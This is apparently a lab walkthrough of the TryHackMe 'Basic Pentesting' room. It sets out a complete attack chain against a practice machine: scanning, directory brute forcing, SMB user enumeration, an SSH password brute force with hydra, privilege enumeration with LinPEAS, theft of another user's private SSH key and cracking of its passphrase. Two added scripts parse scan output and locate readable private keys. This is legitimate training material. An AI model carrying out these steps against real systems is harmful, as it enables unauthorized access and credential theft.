TryHackMe Basic Pentesting Walkthrough

Reading Time: 7 minutes

TryHackMe has many beginner-friendly rooms. If you are just starting with the platform, rooms such as Nmap or Introductory Researching are a great start. However, once you have nailed the basic tools and methodologies, you should increase the difficulty: if you keep solving rooms of the same level, you will not progress much. Today we are going to cover a room that is a great challenge for someone who has the basics and wants more. Welcome to the TryHackMe Basic Pentesting walkthrough.

Room Overview

At the time of writing this walkthrough, the room had over 98,000 participants, and it is about 2.5 years since it was released.

This is a significant number of users. In terms of popularity, the room compares with other popular beginner-friendly rooms, such as Vulnversity, which shows that people see its challenges as a chance to grow.

Let’s take a look at what the room offers.

THM Basic Pentesting has only one big task

Compared with other THM rooms, Basic Pentesting is structured differently. Instead of several tasks, it has only one: Web App Testing and Privilege Escalation. In reality, however, there are many questions behind that single task.

Questions of the Basic Pentesting room

As we can see, the questions vary from finding which services the host is running to obtaining passwords and enumerating information. All of the questions have hints if you are stuck, and if those are not enough you can always refer to this walkthrough.

However, try solving all of the questions on your own, and seek the hints only if you are really stuck.

If you are wondering what the Basic Pentesting THM room focuses on, these are the things you will learn by answering the questions:

  • Brute forcing 
  • Hash cracking 
  • Service and Linux enumeration

Basic Pentesting Writeup

Let’s move on to the solutions of Basic Pentesting. The first question is not a technical one.

Deploy Basic Pentesting machine

It asks you to deploy the victim machine, which is done with the “Start Machine” button. Don’t forget to start the attacker machine at the same time (if you are not using your own), as it takes a while to boot.

The second question asks you to “Find the services exposed by the machine“.

Second question asks you to find exposed services

This one is simple: first we run an Nmap scan. With that basic information we can determine which services the machine runs. The following command, with version detection (-sV) and the default script set (-sC), will do the work:

nmap -v -sC -sV IP_ADDRESS

As a result, you should see six open ports: 22, 80, 139, 445, 8009, and 8080.

Nmap scan results
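A scan like this is easier to work with when it is saved in Nmap’s greppable format (-oG) and parsed, rather than read off the screen. The following shell snippet is an added example, not part of the original walkthrough: it extracts the open ports with their service and version fields from -oG output. The scan text embedded in it is constructed for the demo (the ports match the ones above; the version banners are illustrative), so it runs without a target, and the function names are my own.

```shell
#!/bin/sh
# Added example: pull open ports out of nmap's greppable output (-oG).
# Real use:  nmap -sV -oG scan.gnmap IP_ADDRESS && open_ports < scan.gnmap

# Constructed -oG sample for the demo, not a capture from the room. The port
# list matches the walkthrough; the version banners are illustrative.
SAMPLE_GNMAP="$(printf '%s\n' \
  '# Nmap 7.93 scan initiated as: nmap -sV -oG scan.gnmap 10.10.10.10' \
  "$(printf 'Host: 10.10.10.10 ()\tStatus: Up')" \
  "$(printf 'Host: 10.10.10.10 ()\tPorts: 22/open/tcp//ssh//OpenSSH 7.2p2/, 80/open/tcp//http//Apache httpd 2.4.18/, 139/open/tcp//netbios-ssn//Samba smbd 3.X - 4.X/, 445/open/tcp//netbios-ssn//Samba smbd 4.3.11/, 8009/open/tcp//ajp13//Apache Jserv (Protocol v1.3)/, 8080/open/tcp//http//Apache Tomcat 9.0.7/, 9090/filtered/tcp//zeus-admin///\tIgnored State: closed (993)')" \
  '# Nmap done -- 1 IP address (1 host up) scanned in 12.34 seconds')"

open_ports() {
  # stdin: -oG text. stdout: one "port proto service version" line per open
  # port. Each -oG port entry looks like port/state/proto/owner/service/rpc/version/
  # and the entries are comma separated after "Ports:".
  grep 'Ports:' \
    | sed -e 's/^.*Ports: //' -e 's/[[:space:]]*Ignored State:.*$//' \
    | tr ',' '\n' \
    | sed 's/^[[:space:]]*//' \
    | awk -F'/' '$2 == "open" { printf "%s %s %s %s\n", $1, $3, $5, $7 }'
}

sample_port_list() {
  # Comma-separated open port numbers from the sample, ready for nmap -p.
  printf '%s\n' "$SAMPLE_GNMAP" | open_ports \
    | awk 'NR > 1 { printf "," } { printf "%s", $1 } END { printf "\n" }'
}

# Stand-alone demo: print the parsed table for the sample scan.
printf '%s\n' "$SAMPLE_GNMAP" | open_ports
```

On a live target, `nmap -sV -oG - IP_ADDRESS | open_ports` produces the same table directly. Filtered and closed ports are dropped because only entries whose state field is `open` pass the awk test, which is why the constructed 9090/filtered entry never shows up.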

One of the things that interests us is the Apache web server on port 80 and the website it serves. We can visit it in the browser.

Web page of the Basic Pentesting

However, there is nothing we can do with it. Inspecting the page source is not fruitful either; there is only a mysterious note:

Note in the page HTML

Let’s leave it for the moment and continue with the third question, which asks “What is the name of the hidden directory on the web server (enter name without /)?”

Third question of the room

Since we need to find the hidden directory on the web server, GoBuster is our weapon of choice, and we already know which port the website is on.

gobuster dir -u http://IP_ADDRESS -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

In the results you will see one entry with status 301: /development. That is the answer to the question.

The directory listing contains two interesting text files:

Contents of the development page

dev.txt contains some kind of log, which hints that SMB is configured.

Dev.txt file contains some kind of logs

The other one, j.txt, contains a note from K warning J that J’s password is weak and can be easily cracked.

Contents of the j.txt file

The fourth question asks us to brute force the username and the password.

Fourth question asks to brute force

However, we know that SMB is in use, so before brute forcing we should try enumerating it. This way we may find usernames without an exhaustive brute force attack. We can use the enum4linux script for this purpose:

enum4linux -a IP_ADDRESS

After the command has executed, bingo! We have two usernames: kay and jan.

Usernames were found on SMB

The following questions ask for a username and a password. Because there are two candidates, we don’t know yet which one we need, right? Wrong. Remember the note left by “K” for “J”, telling J that the password is weak and easily crackable? Let’s try brute forcing jan’s password.

hydra -l jan -P /usr/share/wordlists/rockyou.txt ssh://IP_ADDRESS

This command brute forces jan’s SSH password using words from the rockyou.txt wordlist. Hydra may take a while, especially on the TryHackMe attacker box; note that Hydra itself warns that SSH servers often limit the number of parallel connections and recommends running with fewer tasks (-t 4) if you see connection errors. But finally... bingo.

We have successfully bruteforced password of user "jan"

We have successfully brute forced the password for user “jan”. Enter “jan” as the answer to the fifth question, “What is the username?”, and the brute forced password as the answer to the sixth, “What is the password?”.

Answers to the questions

Since we now have credentials for the SSH service, we can log in:

ssh jan@IP_ADDRESS

Enter the password, and we are in.

Logged in to the SSH service

We can immediately answer the seventh question, as SSH was the service used to access the server.

We used SSH to access the server, so the answer is SSH

The eighth question asks to find a way to escalate privileges.

In order to finish the task, we have to escalate privileges

To find a way to do it, we will use LinPEAS, the Linux Privilege Escalation Awesome Script. Let’s download it from the GitHub repository to our machine:

curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh > linpeas.sh

Now copy it to the victim machine over SSH:

scp linpeas.sh jan@IP_ADDRESS:/tmp

We can’t copy it directly into /home/jan; we would get a “Permission denied” error. Instead we can write to /tmp. After that, connect over SSH as jan and run the script:

sh /tmp/linpeas.sh

LinPEAS identified a readable private SSH key belonging to the user kay inside kay’s home directory (/home/kay/.ssh/id_rsa).

Private SSH key was found

We can retrieve it to our own machine:

scp jan@IP_ADDRESS:/home/kay/.ssh/id_rsa .

Before trying to log in, we have to set the private key file permissions properly; ssh refuses to use a key that is readable by other users.

chmod 600 id_rsa

Now we can try to log in as kay:

Passphrase is asked for the user Kay

Unfortunately, the key has a passphrase set. We will have to brute force it with John the Ripper, but first we have to convert the key into a format John understands.

python /opt/john/ssh2john.py id_rsa > johnformat.txt

If you want to use ssh2john without providing the full path and you get a “Command not found” error, refer to my other article on how to solve this problem.

As a result, a file called johnformat.txt is created containing the hash we will feed to John.

john --wordlist=/usr/share/wordlists/rockyou.txt johnformat.txt

The passphrase should be cracked within a minute.

Passphrase for kay’s key
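LinPEAS flagged the key because every user on the box can read it, and the key then turned out to need a passphrase. The following shell snippet is an added example, not code from the walkthrough or from the PEASS-ng project: it performs that check by hand, listing private keys that other users can read, reporting whether each one is passphrase-protected (which tells you up front whether the ssh2john and John step is needed), and taking a copy with the 600 mode that ssh insists on. The key files it creates are constructed stand-ins with no real key material, the user directories only mimic the room’s layout, and the function names are my own.

```shell
#!/bin/sh
# Added example (not from the walkthrough or PEASS-ng): the LinPEAS finding
# done by hand. On a real box run:  report_keys /home

find_readable_keys() {
  # $1: directory to search. Prints small files (under 32 blocks of 512 bytes)
  # that are readable by "others" (o+r) and carry a PEM/OpenSSH private key
  # header, i.e. what any local user such as jan can simply copy.
  find "$1" -type f -size -32 -perm -004 \
       -exec grep -q -e '-----BEGIN .*PRIVATE KEY-----' {} \; -print 2>/dev/null
}

key_is_encrypted() {
  # $1: key file. Returns 0 when a passphrase is needed, 1 when it is not.
  # Legacy PEM keys (BEGIN RSA PRIVATE KEY) announce encryption in a
  # "Proc-Type: 4,ENCRYPTED" header; OpenSSH-format keys store the KDF name
  # ("bcrypt" when encrypted, "none" otherwise) inside the base64 blob.
  if grep -q '^Proc-Type: 4,ENCRYPTED' "$1"; then
    return 0
  fi
  if grep -q 'BEGIN OPENSSH PRIVATE KEY' "$1"; then
    if sed '/^-----/d' "$1" | base64 -d 2>/dev/null | LC_ALL=C grep -q bcrypt; then
      return 0
    fi
  fi
  return 1
}

secure_copy() {
  # $1: source key, $2: destination. ssh ignores keys that are group/world
  # readable, so the copy gets mode 600 straight away.
  cp "$1" "$2" && chmod 600 "$2"
}

report_keys() {
  # $1: directory. One "path encrypted|plain" line per readable key.
  find_readable_keys "$1" | while read -r key; do
    if key_is_encrypted "$key"; then echo "$key encrypted"; else echo "$key plain"; fi
  done
}

make_sample_keys() {
  # Constructed stand-ins for the demo: the bodies are NOT real key material.
  # $1: directory to populate with a few fake home directories.
  mkdir -p "$1/kay/.ssh" "$1/jan/.ssh" "$1/bob/.ssh"
  printf '%s\n' '-----BEGIN RSA PRIVATE KEY-----' 'Proc-Type: 4,ENCRYPTED' \
    'DEK-Info: AES-128-CBC,0123456789ABCDEF0123456789ABCDEF' '' \
    'Tm90IGEgcmVhbCBrZXk=' '-----END RSA PRIVATE KEY-----' > "$1/kay/.ssh/id_rsa"
  chmod 644 "$1/kay/.ssh/id_rsa"        # world readable, passphrase-protected
  printf '%s\n' '-----BEGIN RSA PRIVATE KEY-----' 'Tm90IGEgcmVhbCBrZXk=' \
    '-----END RSA PRIVATE KEY-----' > "$1/jan/.ssh/id_rsa"
  chmod 600 "$1/jan/.ssh/id_rsa"        # properly protected, must not be listed
  { echo '-----BEGIN OPENSSH PRIVATE KEY-----'
    printf 'openssh-key-v1 aes256-ctr bcrypt' | base64
    echo '-----END OPENSSH PRIVATE KEY-----'; } > "$1/bob/.ssh/id_ed25519"
  chmod 644 "$1/bob/.ssh/id_ed25519"    # world readable, passphrase-protected
  { echo '-----BEGIN OPENSSH PRIVATE KEY-----'
    printf 'openssh-key-v1 none none' | base64
    echo '-----END OPENSSH PRIVATE KEY-----'; } > "$1/bob/.ssh/id_backup"
  chmod 644 "$1/bob/.ssh/id_backup"     # world readable, no passphrase
}

# Stand-alone demo on a throwaway directory.
demo_dir="$(mktemp -d)"
make_sample_keys "$demo_dir"
report_keys "$demo_dir"
```

The permission test is on the mode bits (-perm -004) rather than on whether the current user happens to be able to read the file, so the result is the same whether you run it as jan or as root. A real OpenSSH-format blob has length-prefixed fields and NUL bytes around the KDF name; the check only looks for the `bcrypt` string, which is enough to decide whether John is needed.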

Now that we know another user, we can answer the ninth question, “What is the name of the other user you found (all lower case)?”. It’s kay.

Other user we found is Kay

The tenth question asks what we can do with the username and password. The obvious answer: log in and see what files the user has. Let’s log in as kay with the private SSH key (passed to ssh with -i) and the cracked passphrase.

In kay’s home directory there is a file called pass.bak. Checking its contents reveals the flag.

Kay home directory has pass.bak file

And now we have the answer to the eleventh question of the TryHackMe Basic Pentesting room!

Final Words

If you have some ethical hacking skills and know how to use the main tools, this room is a perfect challenge for you. Even if you are a complete beginner, the room is beneficial, as you will learn a lot along the way. And if you are an advanced penetration tester, the good news is that the room is still interesting and you won’t get bored doing the tasks.

That’s it. I hope my TryHackMe Basic Pentesting walkthrough was helpful and that you managed to solve the tasks.

Keep Hacking!
